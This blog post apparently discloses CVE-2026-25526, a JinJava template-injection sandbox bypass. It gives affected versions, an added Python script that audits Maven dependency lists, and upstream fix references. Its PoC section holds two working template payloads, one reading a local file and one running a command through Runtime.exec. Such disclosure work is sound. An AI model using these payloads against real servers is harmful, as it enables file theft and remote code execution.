CVE-2026-25526 JinJava SSTI

exp3n5ive Lv2

Affected versions

2.8.0 <= JinJava < 2.8.3

JinJava < 2.7.6
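
A dependency audit for the two ranges above, as an added example that is not part of the original post. It assumes the Maven coordinate `com.hubspot.jinjava:jinjava` and the `group:artifact:type[:classifier]:version:scope` line format of `mvn dependency:list`. The sample lines are constructed, and flagging qualified builds (such as `-SNAPSHOT`) of a fixed version is a conservative assumption.

```python
import re

# Affected ranges as listed on this page: JinJava < 2.7.6 and 2.8.0 <= JinJava < 2.8.3.
# The 4th field is 0 for a qualified build (-SNAPSHOT, -rc1) and 1 for a release, so a
# pre-release of a fixed version is still flagged (conservative assumption).
AFFECTED = [((0, 0, 0, 0), (2, 7, 6, 1)), ((2, 8, 0, 0), (2, 8, 3, 1))]

# `mvn dependency:list` prints group:artifact:type[:classifier]:version:scope
COORD = re.compile(r"com\.hubspot\.jinjava:jinjava(?::[^:\s]+)+")

# Constructed sample output, not taken from a real project.
SAMPLE = """\
[INFO]    com.hubspot.jinjava:jinjava:jar:2.7.4:compile
[INFO]    org.example:demo-lib:jar:1.0.0:compile
[INFO]    com.hubspot.jinjava:jinjava:jar:2.8.3-SNAPSHOT:runtime
[INFO]    com.hubspot.jinjava:jinjava:jar:2.7.6:compile
"""


def parse_version(text):
    """Return (major, minor, patch, is_release) for a Maven version string."""
    m = re.fullmatch(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?(.*)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    major, minor, patch = (int(g or 0) for g in m.groups()[:3])
    return (major, minor, patch, 0 if m.group(4) else 1)


def is_affected(version):
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED)


def audit(dependency_list):
    """Return [(version, affected)] for every Jinjava coordinate in the output."""
    findings = []
    for line in dependency_list.splitlines():
        m = COORD.search(line)
        if m:
            version = m.group(0).split(":")[-2]  # field before the scope
            findings.append((version, is_affected(version)))
    return findings


if __name__ == "__main__":
    for version, affected in audit(SAMPLE):
        print(f"jinjava {version}: {'AFFECTED' if affected else 'not affected'}")
```

Note that 2.7.6 and later 2.7.x releases fall outside both ranges, so a single "older than 2.8.3" comparison would over-report them.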

POC

File read

{% for _, config, class in ____int3rpr3t3r____ %}{{ config.objectMapper.convertValue(config.objectMapper.readValue('"file:///C:/windows/win.ini"',config.objectMapper.getTypeFactory().constructFromCanonical("java.net.URL")).openStream().readAllBytes(),config.objectMapper.getTypeFactory().constructFromCanonical("java.lang.String")) }}{% endfor %}

RCE

{% for _, config, class in ____int3rpr3t3r____ %}{{ config.objectMapper.readValue('{}',config.objectMapper.getTypeFactory().constructFromCanonical("org.springframework.expression.spel.standard.SpelExpressionParser")).parseExpression("T(java.lang.Runtime).getRuntime().exec('calc')").getValue() }}{% endfor %}

Reference

Arbitrary Java Execution via JinJava Bypass through ForTag
Prevent JinjavaBeanELResolver restriction bypassing through ForTag’s loopVars

  • Title: CVE-2026-25526 JinJava SSTI
  • Author: exp3n5ive
  • Created at : 2026-02-12 14:59:15
  • Updated at : 2026-02-12 15:10:19
  • Link: https://exp3n5ive.github.io/2026/02/12/CVE-2026-25526 JinJava SSTI/
  • License: This work is licensed under CC BY-NC-SA 4.0.